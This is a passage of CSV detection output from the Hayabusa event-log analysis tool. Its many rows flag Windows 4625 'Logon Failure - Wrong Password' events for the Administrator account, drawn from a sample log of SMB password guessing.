Password,User: Administrator | Type: 3 | Computer: 17O1jfGX6KQMPgnD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.905 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3NaqTqrCiPPfNxZF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.950 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Az7cwIWXUGVIMTv5 | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.004 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Djaxf99PVs2VkMy6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.056 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rbTSoTdaQ0Y4c9Gw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.096 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: g9aTo4QBHfrgPYZ2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.128 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dpHKjYzZTn0ruIrf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.168 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HqhPnV6tc8airRqu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.211 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RIOCqtXh5ji12U5q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.254 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RwuGZ0kgg1yToLlr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.289 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZSBbd4qBRuzeKBjD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.337 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8zS1Muxc9gpcqv23 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.380 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: c6wiIkfkgtso42P1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.420 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q1ilRmhSB5RfvpVa | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.456 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PuQ47GGBraimypWL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.504 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UfUsAYWilbwMScpE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.554 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 22ZSltGNwIl0DNDM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.595 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IYwG9IUpdk5DmM8w | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.644 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4a8kbGxQFHDBodGF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.685 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KoLqIaO8p3k9kOkj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.733 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rUnonSx3ZBdkyGhu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.772 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: d1QJziwKhsaJljGV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.807 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZhcNRrpODYB9jZxs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.852 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Yi5JE53caVn7n54w | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.885 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Jx6qTASzFp830ud6 | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.924 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b4L8HtBWlmAMTjCf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.966 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: F4hVfTwibHreepku | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.012 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3TlapK211UT8SO0W | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.059 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Mzzw3uPkn2cgtmlF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.092 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aPnfUjwJei5E5BD7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.133 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Mm1k0eeKAYokIbDg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.166 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: w8TDNcJ3LMyNtUe1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.209 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ogKKslkdXvc9f130 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.252 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sgoy6gMfe5N0UiP5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.289 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lfjf3d6I8TsBOzvc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.328 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Vs8DG8s81oOwYoI7 | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.427 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LFkgN1aDoYkQ4qrT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.459 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KMwLokYpcFIYHegd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.507 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6oKradBV4ERsQnKs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.549 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0qPzlzfmgrbYTKqQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.596 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qKYlBm2lhobHzbjh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.623 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DBMu96oqO9tb3f4O | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.664 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tO04Q3eYdzyuy51v | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.701 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FrIa2UrSrfdhkDCx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.741 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: axhhyMrGl95O16Vg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.783 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: atjvfi8QeEDluhL2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.827 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9HPBZKUiiKeyQwSr | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.872 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2SmitfyjO4mxqw5E | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.904 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Nrq1g8ktTQbPTXqn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.947 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 943GV3t1muba5IQT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.982 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HPVd28zf85AxdGqd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.023 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: D6evoSSxcKkHspuc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.051 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: C4fznmrnIdUH7DzG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.099 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AwrrYjUV41P0K5Jh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.148 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: z4RBZrALEnH5BKP9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.192 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LU6uWH4gs4iHP7rV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.237 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hCfhZDAH8ufk77zN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.277 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TE9pw4UeRldGeKVc | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.312 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Z8PKE05MqxE5TwXT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.357 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GIE5fmddOPBbCM3u | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.414 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Pveyo4Czx6KWKCGn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.453 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zPyyHaRnBec7Qg2x | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.486 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: V3b8mudJp5mdkiEW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.524 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7Y6mjLaCzR28Q2qK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.563 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dMsNKWEjeCYYQVqw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.605 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I7c5fENhkwO6QfEU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.648 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Cr1wAeMhPgVpwV82 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.692 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fErpp9Ww6LO37C9k | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.728 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CYsNpBsGT5zOKe3p | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.866 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sgzUk1Dmttm4AQ3s | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.921 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Hp0c3YYyOSJuBHCR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.965 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gkis4H1MIQPHUwqf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.009 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Lb6mH03qKLb8O7Dz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.051 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: J10xEmhRNWfJ5FCI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.093 
